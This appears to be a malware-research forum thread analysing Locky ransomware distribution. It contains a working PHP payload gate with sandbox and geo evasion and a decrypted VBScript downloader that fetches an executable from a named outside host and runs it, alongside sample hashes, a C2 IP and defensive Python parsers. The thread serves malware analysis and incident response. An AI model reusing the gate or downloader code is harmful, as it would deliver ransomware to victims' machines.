Locky ransomware

Forum for analysis and discussion about malware.
patriq
Posts: 108
Joined: Fri Jun 28, 2013 8:11 pm

Re: Locky ransomware

Post by patriq » Fri Apr 01, 2016 12:40 am

Sample from Distribution Site
https://ransomwaretracker.abuse.ch/host ... lebox.com/

https://www.virustotal.com/en/file/003d ... /analysis/

I'm seeing it POST to 185.75.46.4/submit.php now
https://ransomwaretracker.abuse.ch/ip/1 ... 5.75.46.4/
(listed as offline now?)

Ransom note
_HELP_instructions.gif
Payment:
paymentscreenshot.png

rkhunter
Posts: 1156
Joined: Mon Mar 15, 2010 12:51 pm
Location: Russian Federation

Re: Locky ransomware

Post by rkhunter » Mon Apr 11, 2016 10:51 am

Locky ransomware, TeslaCrypt & other malware families use new tool to evade detection

http://researchcenter.paloaltonetworks. ... detection/

Locky sample in attach.
SHA-256: 4b9a525a80cdba0d827b52d1e19c0b74e055b9afacfa2910dd32230826f91a7a

benkow_
Posts: 85
Joined: Sat Jan 24, 2015 12:14 pm

Re: Locky ransomware

Post by benkow_ » Wed Apr 13, 2016 1:27 pm

Example of a script used to spread Locky (hosted on compromised OpenCart sites, with the URL pattern XXX.com/image/flags/.../40X.php?f=XXX)


<?php
// Gate script as posted: serves the payload named in ?f= only to visitors that pass
// a set of filters, and logs each first-time visitor. Comments added for analysis;
// the logic is unchanged.
error_reporting(0);
$file = isset($_GET['f']) ? $_GET['f'] : "";

if (file_exists($file)) {
    $ip = $_SERVER['REMOTE_ADDR'];
    $ua = $_SERVER['HTTP_USER_AGENT'];
    // Country lookup through the public geoplugin.net service (unserialize of remote data).
    $geoPlugin_array = unserialize( file_get_contents('http://www.geoplugin.net/php.gp?ip=' . $ip) );
    $c_name = $geoPlugin_array['geoplugin_countryName'];
    $c_code = $geoPlugin_array['geoplugin_countryCode'];

    // Filters: visitors geolocated to CN, empty User-Agent, repeat visitors (IP already
    // in the seen list), one specific /24, and anything identifying itself as VirusTotal
    // get an empty response.
    if (0 === strpos($c_code, "CN")) exit;
    if (0 === strlen($ua)) exit;
    if (strpos(file_get_contents($file.".stats_ip.txt"), "IP:".$ip) !== false) exit;
    if (0 === strpos($ip, "173.245.81.")) exit;
    if (false !== strpos($ua, "virustotal")) exit;

    // Tab-separated visitor log, plus the seen-IP list used by the repeat-visitor check above.
    file_put_contents($file.".stats.txt", "DATE:".date("Y-m-d H:i:s")."\tIP:".$ip."\tCOUNTRY:(".$c_code.")".$c_name."\tUA:".$ua."\tREF:".$_SERVER['HTTP_REFERER']."\n", FILE_APPEND);
    file_put_contents($file.".stats_ip.txt", "IP:".$ip."\n", FILE_APPEND);

    // Serve the payload as an uncacheable download.
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($file));
    readfile($file);
}
exit;
?>
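
Added example (mine, not benkow_'s code): a parser for the ".stats.txt" file the gate above appends to, which is what a responder cleaning a compromised OpenCart host has to read to find out who was served the payload. The record layout is taken from the PHP; the sample lines are constructed with documentation-range IPs.

```python
import re
from collections import Counter

# Constructed sample of the ".stats.txt" file the gate appends to; the format is
# taken from the PHP above, the values are made up (documentation-range IPs).
SAMPLE_STATS = (
    "DATE:2016-04-13 10:01:02\tIP:198.51.100.7\tCOUNTRY:(DE)Germany"
    "\tUA:Mozilla/5.0 (Windows NT 6.1; rv:45.0)\tREF:\n"
    "DATE:2016-04-13 10:03:44\tIP:203.0.113.9\tCOUNTRY:(US)United States"
    "\tUA:Mozilla/4.0 (compatible; MSIE 7.0)\tREF:http://example.invalid/landing\n"
    "something that is not a gate record\n"
)

EXPECTED_KEYS = ("DATE", "IP", "COUNTRY", "UA", "REF")
# The gate writes the country as "(CODE)Name", e.g. "(DE)Germany".
COUNTRY_RE = re.compile(r"^\((?P<code>[^)]*)\)(?P<name>.*)$")


def parse_stats(text):
    """Parse gate log lines into dicts; lines that do not fit the format are skipped."""
    records = []
    for line in text.splitlines():
        fields = line.split("\t")
        if len(fields) != len(EXPECTED_KEYS):
            continue
        # Split each field at the first colon only: the UA and REF values contain colons.
        parts = [f.split(":", 1) for f in fields]
        if any(len(p) != 2 for p in parts) or tuple(p[0] for p in parts) != EXPECTED_KEYS:
            continue
        raw = dict(parts)
        m = COUNTRY_RE.match(raw["COUNTRY"])
        records.append({
            "date": raw["DATE"],
            "ip": raw["IP"],
            "country_code": m.group("code") if m else "",
            "country_name": m.group("name") if m else raw["COUNTRY"],
            "user_agent": raw["UA"],
            "referer": raw["REF"],
        })
    return records


def hits_by_country(records):
    """Count first-contact visitors per country code (the gate logs each IP once)."""
    return Counter(r["country_code"] for r in records)
```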

Antelox
Posts: 264
Joined: Sun Mar 21, 2010 10:38 pm

Re: Locky ransomware

Post by Antelox » Fri Apr 29, 2016 1:10 pm

Found inside Locky JS Downloader! =)
inside_locky_js_downloader.jpg
BR,

Antelox

frank_boldewin
Posts: 116
Joined: Thu Apr 22, 2010 8:59 am
Location: germany

Re: Locky ransomware

Post by frank_boldewin » Wed May 11, 2016 7:39 pm

Just analysed a new way Locky tries to install on systems: very small zip files (<1000 bytes); after unzipping there's a rar file, and inside that a .vbe (encrypted .vbs file).
The vbs file tries to download and run a Locky dropper.

Several AV scanners suck at detecting this.

Encrypted .vbe file


'**LE9Cu2HlEvfKIPN**#@~^TwAAAA==@#@&L4Tq~|SkN,xPrtOYa)&&mxYb5E/O(r8VR1WhzA2 kUm^;N/&^DYrWbmCYdJ.{GLREJ@#@&URkAAA==^#~@ 
'**LE9Cu2HlEvfKIPN**#@~^bQIAAA==@#@&tn_KGs9_.mdP{PEyX6^a.my$dNm/RarWJ,@#@&joL4-kl4N6VfG\~x,ZDnCD+64Nn1YcrUmDbwD ?4+sVr# 3Xwl	[2	\kMGU:xD?ODrUT/cJuO+swYE*@#@&ioNt-/m490VGf7P',jw%t7/Ct90V9G\PL~J'J@#@&[r:,x	|$1F^m/lPUnY,xUF~1|^CkPxP1.lOW(L+1YvEHbm.WkWWOc(HduK:nJ*@#@&Nb:,m^Mo9_?9m1d),?nO,mm!oGCjf1^kPx,mM+lD+K8LmO`rb[G94RUODl:rb@#@&	xnAH|^CkR6wUPrM3Pr~P%4Tq$|dd9~~wl^/+@#@&	U|~1Fmm/ jxN@#@&hbYt,^^Mwf_?9m^d@#@&~P,~RDX2n,'Pq~@#@&~P,~cW2x@#@&P,P, hMkO+,xUF~1|1C/cD+k2Gxk+~W[X@#@&,P~Pcdl7+OG6kVn~`s%t7dmt[63Gf\,[,~tCPfw9u#m/~,+P@#@&+	[~hbY4@#@&?nO,t[KIojkl[[1P'~/M+CY6(Ln1YvJ?4+^sRzw2VbmCObWxrbP@#@&t9Pes`/mN[m 6a+UP`oL4\dC4N0V9G\~[,4CPGsxC.m/@#@&E7sAAA==^#~@ 
Decrypted:


' Decrypted downloader as posted; comments added for analysis, code unchanged.
' Payload URL and the local file name it is saved under.
jhgIBKLsd = "http://antiques-bible.com/wp-includes/certificates/V7Dj8u"

heHTDFJHVas = "zxxcxzczqsdas.pif"
' Resolve %temp% as the drop directory.
UFjhvsahdfkDDv = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%temp%")
UFjhvsahdfkDDv = UFjhvsahdfkDDv & "\"
' Fetch the payload over HTTP and write the response body to disk as a binary stream.
dim nnKBNKcas: Set nnKBNKcas = createobject("Microsoft.XMLHTTP")
dim ccGFDHSDccs: Set ccGFDHSDccs = createobject("Adodb.Stream")
nnKBNKcas.Open "GET", jhgIBKLsd, False
nnKBNKcas.Send
with ccGFDHSDccs
    .type = 1
    .open
    .write nnKBNKcas.responseBody
    .savetofile UFjhvsahdfkDDv &  heHTDFJHVas, 2
end with
' Launch the dropped file.
Set hdTYFUsaddc = CreateObject("Shell.Application")
hdTYFUsaddc.Open UFjhvsahdfkDDv & heHTDFJHVas
Dropper attached!
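
Added triage helper (my code, not from frank_boldewin's post) for the encoded .vbe format above: it locates Windows Script Encoder envelopes ("#@~^" ... "^#~@"), reads the two base64 fields, and counts escaped line breaks without decoding the body. Reading the first field as the length of the encoded body and the second as a checksum, both little-endian 32-bit, is my assumption about the format; the sample keeps the page's header and trailer fields and uses filler in place of the encoded text.

```python
import base64
import re
import struct

# Windows Script Encoder envelope: "#@~^" + 8-char base64 field + encoded body
# + 8-char base64 field + "^#~@". Treating the first field as the encoded body
# length and the second as a checksum (both little-endian uint32) is an assumption
# of this example. Inside the body "@#@&" is an escaped CR LF, so counting it gives
# the number of line breaks in the script.
ENVELOPE_RE = re.compile(
    r"#@~\^(?P<len>[A-Za-z0-9+/]{6}==)(?P<body>.*?)(?P<sum>[A-Za-z0-9+/]{6}==)\^#~@",
    re.S,
)


def _u32(field):
    """Decode one 8-char base64 field to an unsigned 32-bit little-endian integer."""
    return struct.unpack("<I", base64.b64decode(field))[0]


def parse_vbe(text):
    """Return one dict per envelope found in text; the body itself is not decoded."""
    found = []
    for m in ENVELOPE_RE.finditer(text):
        body = m.group("body")
        declared = _u32(m.group("len"))
        found.append({
            "offset": m.start(),
            "declared_length": declared,
            "actual_length": len(body),
            "length_ok": declared == len(body),   # mismatch: truncated or edited
            "checksum_field": _u32(m.group("sum")),
            "crlf_count": body.count("@#@&"),
        })
    return found


def looks_like_vbe(text):
    """Cheap first check: both envelope markers present, whatever their state."""
    return "#@~^" in text and "^#~@" in text


# Constructed sample: the two envelopes of the .vbe above with their real header
# and trailer fields, filler in place of the encoded text, lengths made to match.
SAMPLE_VBE = (
    "'**LE9Cu2HlEvfKIPN**#@~^TwAAAA==" + "@#@&" + "x" * 71 + "@#@&" + "URkAAA==^#~@ \r\n"
    + "'**LE9Cu2HlEvfKIPN**#@~^bQIAAA==" + "@#@&" + "y" * 613 + "@#@&" + "E7sAAA==^#~@ "
)
```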

patriq
Posts: 108
Joined: Fri Jun 28, 2013 8:11 pm

Re: Locky ransomware

Post by patriq » Tue May 17, 2016 11:34 pm


ikolor
Posts: 326
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Tue May 24, 2016 5:51 pm


sysopfb
Posts: 97
Joined: Thu Oct 23, 2014 1:22 am

Re: Malware collection

Post by sysopfb » Tue May 24, 2016 11:26 pm


xors
Posts: 163
Joined: Mon May 23, 2016 2:01 am

Re: Locky ransomware

Post by xors » Wed Jun 01, 2016 8:10 pm

From 193.9.28.13


https://malwr.com/analysis/YWRiYjMwYTc0 ... JhNzg5NDc/ (packed)

https://malwr.com/analysis/OTM1NWYzODU1 ... liNmRiZjc/ (unpacked)

There is a PDB path in the packed file:

C:\B4\Actually\snappy\soldiers\spe.pdb

xors
Posts: 163
Joined: Mon May 23, 2016 2:01 am

Re: Locky ransomware

Post by xors » Wed Jun 01, 2016 9:08 pm

